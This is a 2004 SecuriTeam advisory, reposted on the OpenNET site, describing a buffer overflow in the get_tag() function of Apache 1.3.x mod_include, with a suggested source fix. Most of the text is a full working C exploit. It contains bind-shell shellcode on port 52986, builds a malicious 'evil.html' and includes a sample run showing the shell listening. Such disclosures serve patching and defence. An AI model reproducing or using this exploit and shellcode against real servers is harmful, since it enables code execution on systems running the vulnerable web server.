The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[UNIX] Apache Mod_include Local Buffer Overflow


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 25 Oct 2004 10:38:04 +0200
From: SecuriTeam <[email protected]>
To: [email protected]
Subject: [UNIX] Apache Mod_include Local Buffer Overflow

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Apache Mod_include Local Buffer Overflow
------------------------------------------------------------------------


SUMMARY

Mod_include is one of Apache's standard modules which allows users to use 
some features in their HTML pages such as include files, exec commands, 
echo, etc.

A buffer overflow exists within mod_include can lead to code execution 
when parsing HTML tags.

DETAILS

Vulnerable Systems:
 * Apache with mod_include versions 1.3.x

The overflow exists in the get_tag() function in mod_include.c:
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int 
dodecode)
{
..
    term = c;
    while (1) {
        GET_CHAR(in, c, NULL, p);
[1]        if (t - tag == tagbuf_len) {
            *t = '\0';
            return NULL;
        }
/* Want to accept \" as a valid character within a string. */
        if (c == '\\') {
[2]            *(t++) = c;         /* Add backslash */
            GET_CHAR(in, c, NULL, p);
            if (c == term) {    /* Only if */
[3]                *(--t) = c;     /* Replace backslash ONLY for 
terminator */
            }
        }
        else if (c == term) {
            break;
        }
[4]        *(t++) = c;
    }
    *t = '\0';
..
}

The first check (labeled [1]) is used to find the end of the tag buffer. 
However, the check could be skipped if conditions [2] and [4] are met at 
the same time condition [3] is not. Thus, an attacker is able to craft a 
malformed HTML file that overwrites a static buffer causing arbitrary code 
execution to occur with privileges of the HTTP server child process.

Workaround
For those wishing to fix the problem in mod_include, the following line 
should be changed from:
if (t - tag == tagbuf_len) {
to
if (t - tag >= tagbuf_len-1) {

In the get_tag() function. Following is a proof of concept exploit for the 
vulnerability.

Proof Of Concept
/*********************************************************************************
 local exploit for mod_include of apache 1.3.x                             
      *
 written by xCrZx                         /18.10.2004/                     
      *
 bug found by xCrZx                       /18.10.2004/                     
      *
                                                                           
      *
 y0das old shao lin techniq ownz u :) remember my words                    
      *
 http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3                      
      *
                                                                           
      *
 Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike)            
      *
*********************************************************************************/

/*********************************************************************************
 Technical Details:                                                        
      *
                                                                           
      *
 there is an overflow in get_tag function:                                 
      *
                                                                           
      *
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int 
dodecode) *
{                                                                          
      *
..                                                                        
      *
    term = c;                                                              
      *
    while (1) {                                                            
      *
        GET_CHAR(in, c, NULL, p);                                          
      *
[1]        if (t - tag == tagbuf_len) {                                    
      *
            *t = '\0';                                                     
      *
            return NULL;                                                   
      *
        }                                                                  
      *
// Want to accept \" as a valid character within a string. //              
      *
        if (c == '\\') {                                                   
      *
[2]            *(t++) = c;         // Add backslash //                     
      *
            GET_CHAR(in, c, NULL, p);                                      
      *
            if (c == term) {    // Only if //                              
      *
[3]                *(--t) = c;     // Replace backslash ONLY for 
terminator //   *
            }                                                              
      *
        }                                                                  
      *
        else if (c == term) {                                              
      *
            break;                                                         
      *
        }                                                                  
      *
[4]        *(t++) = c;                                                     
      *
    }                                                                      
      *
    *t = '\0';                                                             
      *
..                                                                        
      *
                                                                           
      *
as we can see there is a [1] check to determine the end of tag buffer      
      *
but this check can be skiped when [2] & [4] conditions will be occured     
      *
at the same time without [3] condition.                                    
      *
                                                                           
      *
So attacker can create malicious file to overflow static buffer, on        
      *
which tag points out and execute arbitrary code with privilegies of        
      *
httpd child process.                                                       
      *
                                                                           
      *
Fix:                                                                       
      *
[1*]        if (t - tag >= tagbuf_len-1) {                                 
      *
                                                                           
      *
Notes: To activate mod_include you need write "XBitHack on" in httpd.conf  
      *
                                                                           
      *
*********************************************************************************/

/*********************************************************************************
  Example of work:                                                         
      *
                                                                           
      *
  [root@blacksand htdocs]# make 85mod_include                              
      *
  cc     85mod_include.c   -o 85mod_include                                
      *
  [root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html          
      *
  [root@blacksand htdocs]# chmod +x evil.html                              
      *
  [root@blacksand htdocs]# netstat -na|grep 52986                          
      *
  [root@blacksand htdocs]# telnet localhost 8080                           
      *
  Trying 127.0.0.1...                                                      
      *
  Connected to localhost.                                                  
      *
  Escape character is '^]'.                                                
      *
  GET /evil.html HTTP/1.0                                                  
      *
  ^]                                                                       
      *
  telnet> q                                                                
      *
  Connection closed.                                                       
      *
  [root@blacksand htdocs]# netstat -na|grep 52986                          
      *
  tcp        0      0 0.0.0.0:52986           0.0.0.0:*               
LISTEN     *
  [root@blacksand htdocs]#                                                 
      *
*********************************************************************************/

/*********************************************************************************
  Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always            
      *
*********************************************************************************/

/*********************************************************************************
  Personal hello to my parents :)                                          
      *
*********************************************************************************/

/*********************************************************************************
 Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz     
      *
*********************************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

#define EVILBUF 8202
#define HTMLTEXT 1000

#define HTML_FORMAT "<html>\n<!--#echo done=\"%s\" -->\nxCrZx 0wn 
U\n</html>"

#define AUTHOR "\n*** local exploit for mod_include of apache 1.3.x by 
xCrZx /18.10.2004/ ***\n"

int main(int argc, char **argv) {

        char html[EVILBUF+HTMLTEXT];
        char evilbuf[EVILBUF+1];

        //can be changed
        char shellcode[] =

    // bind shell on 52986 port
    "\x31\xc0"
    "\x31\xdb\x53\x43\x53\x89\xd8\x40\x50\x89\xe1\xb0\x66\xcd\x80\x43"
    "\x66\xc7\x44\x24\x02\xce\xfa\xd1\x6c\x24\x04\x6a\x10\x51\x50\x89"
    "\xe1\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x43\x89\x61\x08\xb0"
    "\x66\xcd\x80\x93\x31\xc9\xb1\x03\x49\xb0\x3f\xcd\x80\x75\xf9\x68"
    "\x2f\x73\x68\x20\x68\x2f\x62\x69\x6e\x88\x4c\x24\x07\x89\xe3\x51"
    "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

    //execve /tmp/sh <- your own program
   /*
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
    "\xc0\x88\x43\x07\x89\x5b\x08\x89"
    "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
    "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
    "/tmp/sh";
   */


        char NOP[] = "\x90\x40";             // special nops ;)
        char evilpad[] = "\\CRZCRZCRZCRZC";  // trick ;)

        int padding,xpad=0;
        int i,fd;
        long ret=0xbfff8688;

        if(argc>1) ret=strtoul(argv[1],0,16);
        else { fprintf(stderr,AUTHOR"\nUsage: %s <RET ADDR> > 
file.html\n\n",argv[0]);exit(0); }

        padding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);

        while(1) {
                if(padding%2==0) { padding/=2; break;}
                else {padding--;xpad++;}
        }

        memset(html,0x0,sizeof html);
        memset(evilbuf,0x0,sizeof evilbuf);

        for(i=0;i<padding;i++)
                memcpy(evilbuf+strlen(evilbuf),&NOP,2);
        for(i=0;i<xpad;i++)
                
memcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);

        memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);
        memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);
        *(long*)&evilbuf[strlen(evilbuf)]=ret;

        sprintf(html,HTML_FORMAT,evilbuf);

        printf("%s",html);

        return 0;
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:[email protected]> 
Crazy Einstein.




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру